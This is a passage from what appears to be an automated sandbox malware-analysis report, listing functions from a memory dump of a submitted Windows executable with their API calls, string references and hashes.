SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8BA4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
Instruction ID: 31d7a6a36e751ae29c5395df524044a6d65d5537799d55931913656c4ee213b7
Opcode Fuzzy Hash: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
Instruction Fuzzy Hash: 1B114C79901218FFDB10DF95CC84F9DBB78FB48310F204095EA00B7290DA716E11DBA4

Function 00251290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
GetClientRect.USER32(?,?), ref: 0028B5FB
GetCursorPos.USER32(?), ref: 0028B605
ScreenToClient.USER32(?,?), ref: 0028B610

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
Instruction ID: de30b1377cb934adb6719fb827d3133123f8964c2b91a004bf0869d9828e5cd8
Opcode Fuzzy Hash: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
Instruction Fuzzy Hash: 80112B35A21029FFCB00DF94D989AFE77B8EB05305F504456FD11E7240C730AA65CBA9

Function 002AD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002AD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002AD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002AD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002AD897

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
Instruction ID: 48301fd9c63bc9aa9754f7dd9b9e465fd237b741598d53fca640d4eacb65a5e7
Opcode Fuzzy Hash: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
Instruction Fuzzy Hash: D4116575A16304DFE3208F50ED0CF97BBBCEB01700F108969A657D6850DBF8E9569BA1

Function 00286FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00286FDB

Part of subcall function 002876C2: __fltout2.LIBCMT ref: 002876EB

__cftog_l.LIBCMT ref: 00287001
__cftoe_l.LIBCMT ref: 00287033

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3cc8a9135d57e9501539cda496d3f31b0ce98bea7cdfb081032cf98fce94bc72
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E701407A46914EBBCF166F84CC45CED3F66BB28351F688415FE18580B1D236C9B1AF81

Function 002DB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002DB2E4
ScreenToClient.USER32(?,?), ref: 002DB2FC
ScreenToClient.USER32(?,?), ref: 002DB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB33B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
Instruction ID: 53bdd0309523c00b767598f927e12f5fa6730b74a8945754b6cc5e472247ca9c
Opcode Fuzzy Hash: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
Instruction Fuzzy Hash: 02117775D00209EFDB41CF99D5449EEBBF9FF08310F108166E915E3620D731AA618F90

Function 002B6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 002B6BE6

Part of subcall function 002B76C4: _memset.LIBCMT ref: 002B76F9

_memmove.LIBCMT ref: 002B6C09
_memset.LIBCMT ref: 002B6C16
LeaveCriticalSection.KERNEL32(?), ref: 002B6C26

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
Instruction ID: 48af15637d4b0189b4879c9e7064d012cb1797b98493344fc9c4c18c7d0fbd05
Opcode Fuzzy Hash: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
Instruction Fuzzy Hash: 8DF0303A500100ABCF416F55EC89A8ABB29EF45360F04C061FE095E226C731E921DFB4

Function 00252218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00252231
SetTextColor.GDI32(?,000000FF), ref: 0025223B
SetBkMode.GDI32(?,00000001), ref: 00252250
GetStockObject.GDI32(00000005), ref: 00252258
GetWindowDC.USER32(?,00000000), ref: 0028BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0028BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0028BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0028BEC2
GetPixel.GDI32(00000000,?,?), ref: 0028BEE2
ReleaseDC.USER32(?,00000000), ref: 0028BEED

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
Instruction ID: 584b0443ed7b09439afac8325106f996c31ca299915b59fe0de9721033fed7eb
Opcode Fuzzy Hash: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
Instruction Fuzzy Hash: 9EE03932915245EADF615FA4FD0D7D83B10EB15332F04C36BFA6A880E187718994DB16

Function 002A8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 002A871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A82E6), ref: 002A872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8736

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
Instruction ID: 355de3964a3584813803212e715b19f1c2f61e04c90990dd4bf8a4f1c438cf10
Opcode Fuzzy Hash: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
Instruction Fuzzy Hash: 13E0863AE162129BD7A05FB07E0CB567BACEF51792F158829B686CA040DA348C51C754

Function 00256240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%., xrefs: 0025624E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID: %.
API String ID: 0-3490990516
Opcode ID: 3e22d3694e80b1510641e97501a6a1a96737ead9c609c8d10a6edd5fbbb08690
Instruction ID: 0bae63cf25f787e61e89e12d01e9e3f1631add3f332b31d0372477d7afdeac37
Opcode Fuzzy Hash: 3e22d3694e80b1510641e97501a6a1a96737ead9c609c8d10a6edd5fbbb08690
Instruction Fuzzy Hash: 69B1E77182010A9BCF24EF94C489AFEB7B5FF48312F904066ED01A7191DB749EA9CB59

Function 002CAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 002CAFAE

Strings

xb1, xrefs: 002CAFE4
xb1, xrefs: 002CB010

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __itow_s
String ID: xb1$xb1
API String ID: 3653519197-3895555787
Opcode ID: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
Instruction ID: 2ef5e16487d427564c93d8290ad8b6fd9a54bf8d744014471723855f7de3f6d6
Opcode Fuzzy Hash: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
Instruction Fuzzy Hash: 35B1BF70A1020AEFCB15DF54C891EBABBB9FF58300F14815DF9499B251EB71D9A4CB60

Function 002BAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

__wcsnicmp.LIBCMT ref: 002BB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB0F6

Strings

LPT, xrefs: 002BB027

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
Instruction ID: da60d29a2c206ebb0c5d62713d94fe297b27855d8c70dff8c5f0a73379eae6f8
Opcode Fuzzy Hash: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
Instruction Fuzzy Hash: 7A618071A20215EFCB15EF98C895EEEB7B4EB08350F044069F91AAB251D7B0AE94CB54

Function 00262957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00262968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00262981

Strings

@, xrefs: 00262975

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
Instruction ID: 6d1a229cdbf2626538981bc7324714ceb89537f35c9e6477ed126391b2f7e4d3
Opcode Fuzzy Hash: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
Instruction Fuzzy Hash: 075158724197449BE320EF10D88ABABBBE8FB85351F41885DF6D8410A1DB70857CCB5A

Function 002B9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00254F0B: __fread_nolock.LIBCMT ref: 00254F29

_wcscmp.LIBCMT ref: 002B9824
_wcscmp.LIBCMT ref: 002B9837

Strings

FILE, xrefs: 002B9770

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
Instruction ID: f72559f8bc424a0d3e828d38e95a97772df97093cf20ecc8e0069c18bd465fb6
Opcode Fuzzy Hash: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
Instruction Fuzzy Hash: 0F41F831A1020ABADF20AFA4CC49FEFBBBDDF85714F000069FA05B7181DA71A9548B64

Function 00290574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0029057F

Strings

Dd1, xrefs: 0025A317
Dd1, xrefs: 0025A151

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClearVariant
String ID: Dd1$Dd1
API String ID: 1473721057-713089410
Opcode ID: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
Instruction ID: 01d1ee210d303e51befb24258a836765192f1e7aead74522e3d1941ead6dfcd2
Opcode Fuzzy Hash: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
Instruction Fuzzy Hash: 6B5122786253028FDB54CF19C482A5ABBF1BB88355F54891CED858B320D731EC99CF86

Function 002C258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002C259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C25D4

Strings

|, xrefs: 002C25A5

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 11d7b9ad361e6b9f3807141cc9b4b7735c28c4f36da499539e3f704ed5faba8a
Instruction ID: caeac654425855b65142b0c77a828af5fd02e827f3b289ca284b102d894ddfcb
Opcode Fuzzy Hash: 11d7b9ad361e6b9f3807141cc9b4b7735c28c4f36da499539e3f704ed5faba8a
Instruction Fuzzy Hash: B4310771C20119EBCF01AFA4DC85EEEBBB9FF08310F100169ED15A6162DA315A69DF60

Function 002D7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 002D7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D7B76

Strings

', xrefs: 002D7ACA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 88c65b923efb08b8c11ada81880d46e6a6d3e382c904f5508f9939a042f2c8df
Instruction ID: 411c802e9ba4e7711784fc13247558027277a1eab7f8511d1b2ed13b6285ecb4
Opcode Fuzzy Hash: 88c65b923efb08b8c11ada81880d46e6a6d3e382c904f5508f9939a042f2c8df
Instruction Fuzzy Hash: DD41F874A1520ADFDB14CF64C981BEABBB9FB09304F10416AE905AB391E774AD51CF90

Function 002D6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 002D6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D6B53

Strings

static, xrefs: 002D6AB3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e97de9aa269495bad4e81f167f6af61aa7f5bf48898c1faff9ee1db3764ee799
Instruction ID: e9fbe32ef4b3199d69e283b571b73bd2a7550f986e5bace605ec24c57e5879f9
Opcode Fuzzy Hash: e97de9aa269495bad4e81f167f6af61aa7f5bf48898c1faff9ee1db3764ee799
Instruction Fuzzy Hash: BD31C171120204AEDB109F24CC44BFB77B8FF48764F10851AF9A5D7290DB30ACA1CB64

Function 002B28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B294C

Strings

0, xrefs: 002B290A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 884bd54b18c638cc819707687a3d9311cee4cb54855411fe4056e50faa3a4559
Instruction ID: 6099932dea692238dc2fc7d46ec46b00cc1b76d9f9d6f5c15ee1da5efacd4428
Opcode Fuzzy Hash: 884bd54b18c638cc819707687a3d9311cee4cb54855411fe4056e50faa3a4559
Instruction Fuzzy Hash: 02312831A20706DFEB25CF48DC85BEEBBF8EF453D0F244019E999A61A0D7709968CB11

Function 002D66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D676C

Strings

Combobox, xrefs: 002D672E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 135190bddc8e2221944c58ddd04ec188c1dcabb349ec9edc6a7e87121659b76e
